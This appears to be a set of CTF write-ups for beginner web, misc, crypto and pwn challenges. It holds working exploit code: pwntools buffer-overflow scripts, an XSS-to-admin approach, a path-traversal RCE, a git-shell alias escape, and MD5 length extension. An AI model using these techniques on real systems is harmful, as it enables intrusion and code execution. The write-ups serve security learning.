Write-ups for the more interesting newbie CTF challenges.
web#
babyjvav#
https://www.tritium.work/2023/11/06/Java Pitfalls for Beginners/
secchat#
The chat page has a DOM XSS: user-controlled content is inserted with innerHTML. It can be triggered with an `<svg onload=...>` tag or the `onerror` attribute of an `<img>` tag.
Note that when a chat is started, the id is passed to the message function. So put the XSS payload in the id and send it to the admin; the payload then runs in the admin's browser, and you can drive the admin's actions through the page's own function calls.
I want to score 500 in the snow#
...I think this challenge is quite simple.
```javascript
daxue = new Proxy({
    "math": "150",
    "computer": new String("150"),
    "politics": 98,
    "english": 100,
    "flag": 0,
    value: 500
}, {
    get: function (target, prop, receiver) {
        // politics: each read returns the current value and then bumps it,
        // so successive reads give 98, 99, 100, 100, ...
        if (prop === 'politics') {
            if (target.politics !== 100) {
                return target.politics++;
            } else {
                return target.politics;
            }
        }
        // valueOf: used when the proxy is coerced to a number (e.g. daxue == 500),
        // so the object as a whole evaluates to target.value (500)
        if (prop === "valueOf") {
            return function () {
                return target.value;
            };
        }
        // english: the first read returns 100 and bumps the stored value to 101;
        // every later read returns the string "99"
        if (prop === 'english') {
            if (target.english !== 100) {
                return "99";
            } else {
                return target.english++;
            }
        }
        // everything else behaves like a normal property read
        return Reflect.get(target, prop, receiver);
    }
});
```
My new flask#
The upload handler trusts the client-supplied filename, so you can overwrite /src/app.py by uploading a file under that path and add a malicious route to it. If the server reloads the module (for example Flask's debug reloader), the new route is live immediately and gives remote code execution (RCE).
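To make the bug and its fix concrete, here is an added example (my own code, not the challenge's source) showing the path-joining pattern that lets an upload land on /src/app.py, next to a hardened check. The upload directory `/tmp/uploads`, the extension allow-list and the sample filenames are assumptions for this example; in a Flask app the name would come from `request.files["file"].filename`, and werkzeug's `secure_filename()` covers the basename-and-sanitise step.

```python
import os
from pathlib import Path

# Assumptions for this example: uploads should land here and nowhere else,
# and only these extensions are acceptable.
UPLOAD_DIR = Path("/tmp/uploads")
ALLOWED_EXT = {"png", "jpg", "jpeg", "txt"}


def unsafe_save_path(filename: str) -> str:
    """The pattern behind the challenge: the client-supplied name is joined to
    the upload dir unchanged. An absolute name replaces the base path entirely
    and '..' segments walk out of it, so '../../src/app.py' becomes /src/app.py."""
    return os.path.normpath(os.path.join(str(UPLOAD_DIR), filename))


def safe_save_path(filename: str) -> Path:
    """Hardened version: keep only the final path component, allow-list the
    extension, and verify the resolved target is still inside UPLOAD_DIR."""
    # Treat backslashes as separators too, in case the client is on Windows.
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or name in (".", "..") or name.startswith("."):
        raise ValueError(f"rejected filename: {filename!r}")
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension not allowed: {filename!r}")
    base = UPLOAD_DIR.resolve()
    dest = (base / name).resolve()
    if dest.parent != base:  # belt and braces: never escape the upload dir
        raise ValueError(f"path escapes upload dir: {filename!r}")
    return dest


def is_rejected(filename: str) -> bool:
    """True if the hardened check refuses the name."""
    try:
        safe_save_path(filename)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    # Constructed sample filenames an attacker (or a normal user) might send.
    for f in ("../../src/app.py", "/src/app.py", "photo.png", "evil.py"):
        print(f"{f!r:20} unsafe -> {unsafe_save_path(f):20} rejected by safe check: {is_rejected(f)}")
```

The extension allow-list matters as much as the path check: even with traversal blocked, a `.py` dropped into a directory that is on `sys.path` or served by the reloader is still a code-execution primitive.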
misc#
Snow Tree Saw Structure#
This challenge runs you in git-shell, a rarely used restricted shell that only lets you invoke git. A git alias whose value starts with `!` is executed as a shell command, and `-c` lets you define that alias on the command line, so git itself becomes the way to run an external program:
```shell
git -c alias.test='!/readflag' test
```
The alias is used to launch the external command `/readflag`.
Memory Forensics#
Use Volatility (vol) to list the processes, dump backdoor.exe, and read the flag out of the dumped executable.
What was before 3G#
This was presumably meant to test information theory, but in a CTF environment there is always a shortcut.
```python
from pwn import *

# Every connection is a fresh game with 7 chests. Guessing that all of them hold
# treasure is right with probability 1/128, so just reconnect until it is.
while True:
    r = remote("172.20.14.117", 53001)
    for i in range(15):
        print(r.recvuntil(b"Ask Shannon:\n[-] "))
        r.sendline(b"1")  # answer each of the 15 question rounds with 1
    r.recvuntil(b"Now open the chests:\n[-] ")
    r.sendline(b'1 1 1 1 1 1 1')  # claim every chest holds treasure
    res = r.recvline().decode()
    if "You've found all the treas" in res:
        print(res)
        break
    else:
        print("next")
        r.close()
        continue
```
With 7 chests there are only 2^7 = 128 possible layouts, so the all-ones guess hits after about 128 connections on average.
crypto#
hard_pow#
I couldn't understand the hashpumpy length extension attack, so I used a simple substitution.
https://github.com/shellfeel/hash-ext-attack/tree/master
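Since the note above refers to the length-extension attack without showing how it works, here is an added example (my own code, not the author's solution and not code from the linked hash-ext-attack repository) that carries the attack out against MD5 in pure Python. The page does not say which hash the challenge used; MD5 is assumed here because it is the smallest Merkle-Damgard hash to write out, and the same continue-from-the-digest trick applies to SHA-1 and SHA-256, which is what hashpumpy automates. The secret, message and extension values are constructed; the attacker side uses only the digest and the length of secret||message.

```python
import hashlib
import math
import struct

# Pure-Python MD5 with an injectable starting state, so hashing can be resumed
# from a known digest: that resumption is the whole length-extension attack.
_S = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
_K = [int(abs(math.sin(i + 1)) * 2 ** 32) & 0xFFFFFFFF for i in range(64)]
_INIT = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md5_padding(msg_len):
    """The bytes MD5 appends to a msg_len-byte message: 0x80, zeros to 56 mod 64, 64-bit LE bit length."""
    zeros = (55 - msg_len) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack("<Q", (msg_len * 8) & 0xFFFFFFFFFFFFFFFF)


def _compress(state, blocks):
    """Run the MD5 compression function over whole 64-byte blocks from a given state."""
    a0, b0, c0, d0 = state
    for off in range(0, len(blocks), 64):
        m = struct.unpack("<16I", blocks[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(64):
            if i < 16:
                f, g = (b & c) | (~b & _MASK & d), i
            elif i < 32:
                f, g = (d & b) | (~d & _MASK & c), (5 * i + 1) % 16
            elif i < 48:
                f, g = b ^ c ^ d, (3 * i + 5) % 16
            else:
                f, g = c ^ (b | (~d & _MASK)), (7 * i) % 16
            f = (f + a + _K[i] + m[g]) & _MASK
            a, d, c = d, c, b
            b = (b + _rotl(f, _S[i])) & _MASK
        a0, b0, c0, d0 = (a0 + a) & _MASK, (b0 + b) & _MASK, (c0 + c) & _MASK, (d0 + d) & _MASK
    return a0, b0, c0, d0


def md5(data, state=_INIT, already_hashed=0):
    """MD5 of data. With state/already_hashed it resumes after already_hashed bytes
    (a multiple of 64) have already been absorbed and produced `state`."""
    padded = data + md5_padding(already_hashed + len(data))
    return struct.pack("<4I", *_compress(state, padded))


def length_extend(digest, known_len, extension):
    """Given digest = MD5(secret || msg) and known_len = len(secret || msg), return
    (suffix, forged) such that MD5(secret || msg || suffix) == forged, never seeing secret."""
    state = struct.unpack("<4I", digest)      # the digest IS the internal state after the last block
    glue = md5_padding(known_len)             # the padding the server's hash already absorbed
    forged = md5(extension, state, known_len + len(glue))
    return glue + extension, forged


def check_forgery(secret, msg, extension):
    """Self-check against hashlib: the attacker only gets the digest and len(secret)."""
    digest = hashlib.md5(secret + msg).digest()
    suffix, forged = length_extend(digest, len(secret) + len(msg), extension)
    return hashlib.md5(secret + msg + suffix).digest() == forged


if __name__ == "__main__":
    # Constructed sample values; the attacker is assumed to know only len(SECRET).
    SECRET, MSG, EXT = b"s3rv3r-s3cr3t", b"user=guest", b"&user=admin"
    print("md5('abc') matches hashlib:", md5(b"abc") == hashlib.md5(b"abc").digest())
    print("forged tag accepted by server:", check_forgery(SECRET, MSG, EXT))
```

The attacker has to send `msg || glue || extension` (the glue padding bytes included) for the forged digest to verify, which is why the secret's length must be known or brute-forced; an HMAC, or hashing with the secret appended rather than prepended, is what closes this hole.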
easy_pow#
Just run brutehash to solve it, no need for a script.
easy_dhke#
Everything (p, g and both private keys) has been leaked, so just copy the leaked code into a pwntools script.
```python
from Crypto.Util.number import *
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
from pwn import *

# p is the large prime modulus of the Diffie-Hellman exchange
p = 327824197795087630552811243153730025469
# g is the generator used to derive the public keys
g = 5
# alice and bob are the leaked private exponents
alice = 22751
bob = 39494
# Bob's public key (uppercase to distinguish it from the private key)
Bob = pow(g, bob, p)
# The shared secret as Alice computes it: Bob's public key raised to Alice's private key mod p.
# This is used directly as the AES key, exactly as the leaked code does.
key = long_to_bytes(pow(Bob, alice, p))


def encrypt(plain_text: bytes, key: bytes) -> bytes:
    cipher = AES.new(key, AES.MODE_ECB)
    cipher_text = cipher.encrypt(pad(plain_text, AES.block_size))
    return cipher_text


def decrypt(encrypt_text: bytes, key: bytes) -> bytes:
    cipher = AES.new(key, AES.MODE_ECB)
    plain_text = unpad(cipher.decrypt(encrypt_text), AES.block_size)
    return plain_text


r = remote('172.20.14.117', 40766)
r.recvuntil(b'[+] Alice said :\n')
cipher = r.recvuntil(b'\n')[0:-1]   # ciphertext as sent, without the trailing newline
print(cipher)
message = decrypt(cipher, key)
print(message)
r.recvuntil(b"[+] Now tell me what are they talking about:")
r.sendline(message)
r.recvuntil(b"[+] Tell me the cipher:")
r.send(encrypt(b'HackedBy0xfa', key))
print(r.recvall())
```
easy_rsa#
The n in this challenge is easy to factor. Look it up on factordb to get p and q, compute d, and decrypt.
leak_d#
Since you already know d, you can decrypt it directly.
I seem to have deleted the script.
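For the two RSA challenges above (easy_rsa, where n is factored, and leak_d, where d is handed over), here is an added example (my own code, not the author's deleted script) of the arithmetic each one needs, in plain Python with no third-party modules. The primes, exponent and plaintext are constructed toy values far too small for real use; the actual challenge parameters are not on the page.

```python
from math import gcd


def bytes_to_int(b: bytes) -> int:
    return int.from_bytes(b, "big")


def int_to_bytes(m: int) -> bytes:
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def encrypt(m: bytes, e: int, n: int) -> int:
    x = bytes_to_int(m)
    if x >= n:
        raise ValueError("plaintext too large for this modulus")
    return pow(x, e, n)


def private_exponent(p: int, q: int, e: int) -> int:
    """easy_rsa: once n = p*q is factored, d is the inverse of e modulo phi(n) = (p-1)(q-1)."""
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e is not invertible mod phi(n)")
    return pow(e, -1, phi)  # modular inverse; Python 3.8+


def decrypt_with_d(c: int, d: int, n: int) -> bytes:
    """leak_d: with d already known, m = c^d mod n and no factoring is needed."""
    return int_to_bytes(pow(c, d, n))


def decrypt_from_factors(c: int, p: int, q: int, e: int) -> bytes:
    """easy_rsa end to end: factors -> d -> plaintext."""
    return decrypt_with_d(c, private_exponent(p, q, e), p * q)


# Constructed toy parameters (assumption for the example; both primes are ~2^30).
P, Q, E = 1000000007, 998244353, 65537
N = P * Q
FLAG = b"toy_rsa"  # 7 bytes, so its integer value stays below N (~2^60)


def roundtrip() -> tuple:
    """Returns (plaintext via factors, plaintext via leaked d) for the toy parameters."""
    c = encrypt(FLAG, E, N)
    d = private_exponent(P, Q, E)
    return decrypt_from_factors(c, P, Q, E), decrypt_with_d(c, d, N)


if __name__ == "__main__":
    print(roundtrip())
```

On a real challenge replace P, Q (from factordb) or d (from the leak) and the given c and n; the only thing to watch is that `int_to_bytes` drops leading zero bytes, which is fine for flags but not for arbitrary binary plaintext.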
pwn#
right#
I figured this out myself. It's the simplest ret2text from ctfwiki.
```python
from pwn import *

context(os='linux', arch='amd64', log_level='debug')
r = remote("172.20.14.117", 28202)
# address of the instruction in the binary that calls system (the target of the ret2text)
addr = 0x40115A
# 0x20 bytes fill the buffer at rbp-0x20, 8 more overwrite the saved rbp,
# and the next 8 bytes replace the return address with addr
payload = flat([b'a' * 0x28, addr])
r.recvuntil(b'so please tell me what you want to tell me\n')
r.sendline(payload)
r.interactive()
```
addr is the address of the line that calls system. The buffer starts at rbp-0x20, so 0x20 + 8 = 0x28 bytes of padding reach the saved return address at the top of the frame, and the next 8 bytes overwrite it.
onepiece#
```python
from pwn import *

io = remote("172.20.14.117", 61768)
addr = 0x40119e
# 0x100 bytes of filler, then the target address repeated 0x100 times:
# wherever the return address sits within that range, it gets overwritten with addr
payload = b"a" * 0x100 + p64(addr) * 0x100
io.sendline(payload)
io.interactive()
```
I randomly came up with this. I couldn't understand blindpwn.